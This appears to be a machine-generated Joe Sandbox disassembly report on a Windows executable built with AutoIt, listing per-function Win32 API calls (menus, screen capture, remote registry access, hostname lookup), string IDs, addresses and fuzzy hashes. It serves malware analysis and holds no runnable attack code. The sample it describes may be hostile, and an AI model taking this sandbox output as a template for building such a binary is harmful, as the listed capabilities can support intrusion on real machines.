                                                              • Instruction ID: 4b67461f1d7fac1195f09accd9e0c49c277a3fd710b0d332433846a9f6104a9b
                                                              • Opcode Fuzzy Hash: 3840be858e9b721e71c8f95fb15e2032d682e63d3e6dfd021b8c1ccc694b39a3
                                                              • Instruction Fuzzy Hash: 888180B19042419FCF24EF65C844A6BBBE4AF89314F14483FF889DB251E638ED45CB5A
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004BC1FC
                                                              • GetFocus.USER32 ref: 004BC20C
                                                              • GetDlgCtrlID.USER32(00000000), ref: 004BC217
                                                              • _memset.LIBCMT ref: 004BC342
                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 004BC36D
                                                              • GetMenuItemCount.USER32(?), ref: 004BC38D
                                                              • GetMenuItemID.USER32(?,00000000), ref: 004BC3A0
                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 004BC3D4
                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 004BC41C
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004BC454
                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 004BC489
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                              • String ID: 0
                                                              • API String ID: 1296962147-4108050209
                                                              • Opcode ID: 40b655913d8db53b5aec221a33c96b2900b649b018ce5a77658baab63b53b81a
                                                              • Instruction ID: 44b227534b984fe46bd71ad8088ef5e669019ad1380c54da2e5c736fb4e79d23
                                                              • Opcode Fuzzy Hash: 40b655913d8db53b5aec221a33c96b2900b649b018ce5a77658baab63b53b81a
                                                              • Instruction Fuzzy Hash: 44816C70608301AFD714DF14C8D4AABBBE4EB88714F00492FFA9597291D778D905CBAA
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 004A738F
                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 004A739B
                                                              • CreateCompatibleDC.GDI32(?), ref: 004A73A7
                                                              • SelectObject.GDI32(00000000,?), ref: 004A73B4
                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 004A7408
                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 004A7444
                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 004A7468
                                                              • SelectObject.GDI32(00000006,?), ref: 004A7470
                                                              • DeleteObject.GDI32(?), ref: 004A7479
                                                              • DeleteDC.GDI32(00000006), ref: 004A7480
                                                              • ReleaseDC.USER32(00000000,?), ref: 004A748B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                              • String ID: (
                                                              • API String ID: 2598888154-3887548279
                                                              • Opcode ID: aa038baa817eb93dd7d4912401168c92a61f75d303337d4ad467928d58513b6c
                                                              • Instruction ID: 9564fca4adc6d706f3a4d0af48cda8b7be437c398fb12a3ae8afcea99d9aab50
                                                              • Opcode Fuzzy Hash: aa038baa817eb93dd7d4912401168c92a61f75d303337d4ad467928d58513b6c
                                                              • Instruction Fuzzy Hash: A5515875904209EFCB24CFA8CC84EAFBBB9EF49310F14852EF95997221C735A845CB54
                                                              APIs
                                                                • Part of subcall function 00450957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00436B0C,?,00008000), ref: 00450973
                                                                • Part of subcall function 00434750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00434743,?,?,004337AE,?), ref: 00434770
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00436BAD
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00436CFA
                                                                • Part of subcall function 0043586D: _wcscpy.LIBCMT ref: 004358A5
                                                                • Part of subcall function 0045363D: _iswctype.LIBCMT ref: 00453645
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 537147316-1018226102
                                                              • Opcode ID: 5c41172028cf3d871fbc6184111276798deba7bfc23bf5e02e8f8d2435126951
                                                              • Instruction ID: 3e2d1a7d025324bd6ba8941fd8a84b760951e72e4ab90c6e1ffcb07a29f3e56c
                                                              • Opcode Fuzzy Hash: 5c41172028cf3d871fbc6184111276798deba7bfc23bf5e02e8f8d2435126951
                                                              • Instruction Fuzzy Hash: 3D02AF741083419FC724EF26C8819AFBBE5AF98318F10491FF485972A1DB38D949CB5B
                                                              APIs
                                                              • _memset.LIBCMT ref: 00492D50
                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00492DDD
                                                              • GetMenuItemCount.USER32(004F5890), ref: 00492E66
                                                              • DeleteMenu.USER32(004F5890,00000005,00000000,000000F5,?,?), ref: 00492EF6
                                                              • DeleteMenu.USER32(004F5890,00000004,00000000), ref: 00492EFE
                                                              • DeleteMenu.USER32(004F5890,00000006,00000000), ref: 00492F06
                                                              • DeleteMenu.USER32(004F5890,00000003,00000000), ref: 00492F0E
                                                              • GetMenuItemCount.USER32(004F5890), ref: 00492F16
                                                              • SetMenuItemInfoW.USER32(004F5890,00000004,00000000,00000030), ref: 00492F4C
                                                              • GetCursorPos.USER32(?), ref: 00492F56
                                                              • SetForegroundWindow.USER32(00000000), ref: 00492F5F
                                                              • TrackPopupMenuEx.USER32(004F5890,00000000,?,00000000,00000000,00000000), ref: 00492F72
                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00492F7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                              • String ID:
                                                              • API String ID: 3993528054-0
                                                              • Opcode ID: def8f307c36392f70dbaae0a8e6c729584f1499c8b5c7309b1fc26b85c0b5e30
                                                              • Instruction ID: 723434facf599a0d59b87035b3182a11987e658f6349be3816acea515734af49
                                                              • Opcode Fuzzy Hash: def8f307c36392f70dbaae0a8e6c729584f1499c8b5c7309b1fc26b85c0b5e30
                                                              • Instruction Fuzzy Hash: 0E71D270640205BBEF219F55DD85FAABF64FB04324F100237F619A62E1C7F96824DB99
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 004A88D7
                                                              • CoInitialize.OLE32(00000000), ref: 004A8904
                                                              • CoUninitialize.OLE32 ref: 004A890E
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 004A8A0E
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 004A8B3B
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,004C2C0C), ref: 004A8B6F
                                                              • CoGetObject.OLE32(?,00000000,004C2C0C,?), ref: 004A8B92
                                                              • SetErrorMode.KERNEL32(00000000), ref: 004A8BA5
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004A8C25
                                                              • VariantClear.OLEAUT32(?), ref: 004A8C35
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                              • String ID: ,,L
                                                              • API String ID: 2395222682-2286747779
                                                              • Opcode ID: 33fd3316faaa3e1e026b07633174f26bd70b5b57b9cefad690e8560809898d64
                                                              • Instruction ID: 8ddb8eb93558f2b1eb38f1fb0cc6c0126b17f7be908824cd0f1f82e32da4afcc
                                                              • Opcode Fuzzy Hash: 33fd3316faaa3e1e026b07633174f26bd70b5b57b9cefad690e8560809898d64
                                                              • Instruction Fuzzy Hash: 31C159B1604305AFD700EF69C88492BB7E9FF89348F00492EF8899B251DB75ED06CB56
                                                              APIs
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              • _memset.LIBCMT ref: 0048786B
                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004878A0
                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004878BC
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004878D8
                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00487902
                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0048792A
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00487935
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0048793A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                              • API String ID: 1411258926-22481851
                                                              • Opcode ID: 936e9f980f97b6eb3157bde3515116a7ba79be5e9b0ce221c4f74ee5bc9f72d8
                                                              • Instruction ID: f85230890a134429dada4fd1f803fe06b5a475c2f3d057ee0abcfb2bddb49935
                                                              • Opcode Fuzzy Hash: 936e9f980f97b6eb3157bde3515116a7ba79be5e9b0ce221c4f74ee5bc9f72d8
                                                              • Instruction Fuzzy Hash: BD411CB2C14229ABDF21EFA5DC95DEEB778BF08314F00552AF805A3261DB389D04CB94
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,004AFDAD,?,?), ref: 004B0E31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                              • API String ID: 3964851224-909552448
                                                              • Opcode ID: 6a60fbb1e7d73f22319137d5a5561f2ef5df4a04efe7c18cc5cd5da80cb3733a
                                                              • Instruction ID: b0c8838b39500910429bac7da14d8ce978a8c4a296f69f762a7d58b980cee562
                                                              • Opcode Fuzzy Hash: 6a60fbb1e7d73f22319137d5a5561f2ef5df4a04efe7c18cc5cd5da80cb3733a
                                                              • Instruction Fuzzy Hash: 5C41387520424A8BCF20EF12D855AFF3760AF2530AF14445AFC551B292DB7C9D1ACBA8
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0046E2A0,00000010,?,Bad directive syntax error,004BF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0048F7C2
                                                              • LoadStringW.USER32(00000000,?,0046E2A0,00000010), ref: 0048F7C9
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • _wprintf.LIBCMT ref: 0048F7FC
                                                              • __swprintf.LIBCMT ref: 0048F81E
                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0048F88D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                              • API String ID: 1506413516-4153970271
                                                              • Opcode ID: 35c52806403f3bef034c2b6f0d1d95cf7efc62e330108b8406974834e800e7b2
                                                              • Instruction ID: a6df5ee64d5daf32af2fe6e6629bc9dc25dc20675bad8bb3b85ac66f79511aa0
                                                              • Opcode Fuzzy Hash: 35c52806403f3bef034c2b6f0d1d95cf7efc62e330108b8406974834e800e7b2
                                                              • Instruction Fuzzy Hash: CA216172910219EBCF12EF91CC4AEEE7739BF18315F04086FB509660A2DA399618DB59
                                                              APIs
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                                • Part of subcall function 00437924: _memmove.LIBCMT ref: 004379AD
                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00495330
                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00495346
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00495357
                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00495369
                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0049537A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: SendString$_memmove
                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                              • API String ID: 2279737902-1007645807
                                                              • Opcode ID: 7c6dfc13fb0ee9333cd4b9e87a2ec3c014619453dd71bad3be3007eb865fab00
                                                              • Instruction ID: 22cbe2b56277fbd40800c485d26c42913dcaad1d88cefed8a2fe673d43c43e7a
                                                              • Opcode Fuzzy Hash: 7c6dfc13fb0ee9333cd4b9e87a2ec3c014619453dd71bad3be3007eb865fab00
                                                              • Instruction Fuzzy Hash: 6C11936095015979DB30B673CC4AEFF7B7CEBD5B44F20042FB805920D1DEA80D44C668
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 208665112-3771769585
                                                              • Opcode ID: 76b03419e5c1852884c4d80d708f2ab9b10b7f40cedf6d54000b99f5386c25c7
                                                              • Instruction ID: 63f9e1216dddc9093f5ba13a4df3f9a0fd642798378b76ed77554181cc885c8b
                                                              • Opcode Fuzzy Hash: 76b03419e5c1852884c4d80d708f2ab9b10b7f40cedf6d54000b99f5386c25c7
                                                              • Instruction Fuzzy Hash: 5D1108315001086BCF10AB71DC46EDA7BBCDB86716F1002FBF84996152EF788A8A8A58
                                                              APIs
                                                              • timeGetTime.WINMM ref: 00494F7A
                                                                • Part of subcall function 0045049F: timeGetTime.WINMM(?,7694B400,00440E7B), ref: 004504A3
                                                              • Sleep.KERNEL32(0000000A), ref: 00494FA6
                                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00494FCA
                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00494FEC
                                                              • SetActiveWindow.USER32 ref: 0049500B
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00495019
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00495038
                                                              • Sleep.KERNEL32(000000FA), ref: 00495043
                                                              • IsWindow.USER32 ref: 0049504F
                                                              • EndDialog.USER32(00000000), ref: 00495060
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: 01fe271423366aa7219fee6b9116fa53b20dfe68c26053080f85e615f6f1d0dc
                                                              • Instruction ID: 747e1e6ebf0c57fd439715426f5a93b8a552347d75339226df7a7ca21dd1ac15
                                                              • Opcode Fuzzy Hash: 01fe271423366aa7219fee6b9116fa53b20dfe68c26053080f85e615f6f1d0dc
                                                              • Instruction Fuzzy Hash: 4221CF70205601BFEB215F20FC89E363F69EB45349B15223AF509922B5CB258D25CB6E
                                                              APIs
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • CoInitialize.OLE32(00000000), ref: 0049D5EA
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0049D67D
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 0049D691
                                                              • CoCreateInstance.OLE32(004C2D7C,00000000,00000001,004E8C1C,?), ref: 0049D6DD
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0049D74C
                                                              • CoTaskMemFree.OLE32(?,?), ref: 0049D7A4
                                                              • _memset.LIBCMT ref: 0049D7E1
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0049D81D
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0049D840
                                                              • CoTaskMemFree.OLE32(00000000), ref: 0049D847
                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0049D87E
                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 0049D880
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                              • String ID:
                                                              • API String ID: 1246142700-0
                                                              • Opcode ID: 059da28ea00100a5140b4159ecd9696d45c3c1d5296d70ce8d0135d1d8ba9c6c
                                                              • Instruction ID: c50fce7bf9d91325d01810b9ae43b9651b7c82db9270897ed81526a731190bdb
                                                              • Opcode Fuzzy Hash: 059da28ea00100a5140b4159ecd9696d45c3c1d5296d70ce8d0135d1d8ba9c6c
                                                              • Instruction Fuzzy Hash: 73B11C75A00109AFDB04DFA5C884DAEBBB9FF48304F1485AAF909EB261DB34ED45CB54
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 0048C283
                                                              • GetWindowRect.USER32(00000000,?), ref: 0048C295
                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0048C2F3
                                                              • GetDlgItem.USER32(?,00000002), ref: 0048C2FE
                                                              • GetWindowRect.USER32(00000000,?), ref: 0048C310
                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0048C364
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0048C372
                                                              • GetWindowRect.USER32(00000000,?), ref: 0048C383
                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0048C3C6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0048C3D4
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0048C3F1
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0048C3FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
                                                              • Opcode ID: d4c11964ac083952f85d36bb5124cf1026eb255012f6bf1011ae19488484b701
                                                              • Instruction ID: 732b67c96382c078a5d8c15b649db4122c3a4124afa6f6d102c309c124cc9ddb
                                                              • Opcode Fuzzy Hash: d4c11964ac083952f85d36bb5124cf1026eb255012f6bf1011ae19488484b701
                                                              • Instruction Fuzzy Hash: ED518071B00205AFDB08DFB8DD89AAEBBB6EB88310F14863DF909D7290D7709D058B14
                                                              APIs
                                                                • Part of subcall function 00431B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00432036,?,00000000,?,?,?,?,004316CB,00000000,?), ref: 00431B9A
                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004320D3
